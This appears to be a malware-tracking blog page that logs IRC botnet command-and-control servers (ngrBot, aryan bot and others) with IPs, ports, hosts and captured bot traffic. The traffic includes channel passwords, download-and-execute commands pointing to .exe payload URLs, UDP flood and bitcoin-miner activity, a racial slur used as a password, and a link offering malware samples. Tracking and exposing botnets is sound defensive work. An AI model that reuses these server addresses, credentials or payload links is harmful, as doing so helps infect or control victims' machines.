Remote Host Port Number 213.251.170.52 80 92.241.165.155 1863 PASS ngrBot NICK n{US|XPa}rwtnhzp USER rwtnhzp 0 0 :rwtnhzp JOIN #IrcPeru PeruRulz!! Update: NICK n{US|XPa}fnazajf USER fnazajf 0 0 :fnazajf JOIN #IrcPeru PeruRulz!! PRIVMSG #IrcPeru :[DNS]: Blocked 0 domain(s) – Redirected 34 domain(s) PRIVMSG #IrcPeru :[d=”http://wootryp.com/images/quote.swf.exe” s=”159744 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataQcxaxq.exe” – DownloadRead more...
webingenial.com(ngrBot hosted in Ukraine Zharkov Mukola Mukolayovuch)
Remote Host Port Number 212.34.147.101 80 213.251.170.52 80 91.211.117.161 1865 PASS ngrBot NICK n{US|XPa}rluznnc USER rluznnc 0 0 :rluznnc JOIN #main 4m3r1k4 JOIN #cn QUIT :removing hosting infos: http://whois.domaintools.com/91.211.117.161
cash.hi5fotos.info(irc botnet hosted in Netherlands Amsterdam Eurovps)
Resolved : [cash.hi5fotos.info] To [77.235.51.101] Remote Host Port Number 77.235.51.101 4042 PASS google_cache2.tmp NICK n[USA|XP]263051 USER 2630 “” “TsGh” :2630 JOIN #fixed# abc PONG 422 UPDATE: 77.235.51.101:81 Server Password: Username: 0298 Nickname: n[DEU|XP]967032 Channel: #msg# (Password: abc) Channeltopic: :!dl http://rapidshare.com/files/4077174557/mtm3.exe UPDATE: PASS google_cache2.tmp NICK [USA|XP]612840 USER 6128 “” “TsGh” :6128 NICK n[USA|XP]780243 USER 3028 “”Read more...
irc.FBI.net(linux bots hosted in France Ovh Systems)
Resolved : [irc-sbn.no-ip.info] To [46.105.185.99] 46.105.185.99:3301 chanel #rfi hosting infos: http://whois.domaintools.com/46.105.185.99
31.192.105.15(ngrBot hosted in Russian Federation Mir Telematiki Ltd)
Remote Host Port Number 213.251.170.52 80 74.117.178.4 80 31.192.105.15 1863 PASS ngrBot NICK n{US|XPa}acmejod USER acmejod 0 0 :acmejod JOIN #80t35ref 1963.g3rb3rs1t0.3691 JOIN #US JOIN #XP PRIVMSG #XP :[d=”http://dc227.4shared.com/download/d2yFF1wn/dafsdg.exe” s=”81920 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.exe” – Download retries: 0 UPDATE: NICK n{US|XPa}vcaofwk USER vcaofwk 0 0 :vcaofwk JOIN #80t35ref 1963.g3rb3rs1t0.3691 PRIVMSG #80t35ref :[d=”http://modelosregias.com/KLv313G.exe”Read more...
aLissmalatya.co.cc(irc botnet hosted in Netherlands Amsterdam Leaseweb B.v)
aLissmalatya.co.cc 85.17.175.200 Resolved : [cigara.co.cc] To [85.17.175.200] C&C Server: 85.17.175.200:6667 Server Password: Username: fojhrqj Nickname: [DEU|XP|793378] Channel: #!aLis! (Password: test) Channeltopic: Now talking in #!aLiS! Topic On: [ #!aLiS! ] [ .join #!5! ] Topic By: [ hAck ] Now talking in #!5! Topic On: [ #!5! ] [ ] Topic By: [ hAck ]Read more...
52mb malware samples
gbot,3vbot,aryanbot,ngrBot and alot of banking trojan samples in this collection Download: http://adf.ly/28yc5
77.241.199.113(aryan bot hosted in Lithuania Vilnius Uab Baltnetos Komunikacijos)
Remote Host Port Number 213.251.170.52 80 77.241.199.113 6999 PASS none NICK New{US-XP-x86}0030424 USER 0030424 “” “0030424” :0030424 MODE New{US-XP-x86}0030424 +iMm JOIN #bot123 none PONG 422 Now talking in #bot123 Topic On: [ #bot123 ] [ !udp.stop ] Topic By: [ troll2 ] (AryaN{RO-WN7-x86}2743701) [AryaN]: Terminated UDP Flood Thread (AryaN{SK-WN7-x64}5732818) [AryaN]: Terminated UDP Flood Thread (AryaN{NL-WN7-x64}6605476)Read more...
91.226.213.233(irc botnet hosted in Ukraine Pe Ivanov Vitaliy Sergeevich)
Remote Host Port Number 213.251.170.52 80 69.73.179.75 80 76.73.40.242 8332 91.226.213.233 8811 PONG :0x.9001 NICK n{US|XP_32a}jswxou USER jswxou 0 * :jswxou PONG :3CFF0039 JOIN #insomnia nigger PRIVMSG #insomnia :[BITCOIN]: Downloading ufasoft bitcoin miner… PRIVMSG #insomnia :[BITCOIN]: Mining started [user=’nigger’ url=’http://pool.bitclockers.com:8332′ proc=’dnmsal’ id=’1288′] hosting infos: http://whois.domaintools.com/91.226.213.233
tr.ro0t.tk(irc botnet hosted in United States Clifton Park Dotblock.com)
Remote Host Port Number 184.107.181.154 80 66.147.232.161 3131 NICK {XPUSA726474} JOIN #Machine PRIVMSG #Gulumse :.::[Visit]::. Visiting Website Now PRIVMSG #Gulumse :.::[Visit]::. URL visited. PONG tr.ro0t.tk USER COMPUTERNAME * 0 :COMPUTERNAME MODE {XPUSA726474} -ix UPDATE: NICK New{US-XP-x86}6862086 USER 6862086 “” “6862086” :6862086 MODE New{US-XP-x86}6862086 +iMm JOIN #FatmaGul none PRIVMSG #Gulumse :[AryaN]: Failed: Mis Parameter, Usage: visitRead more...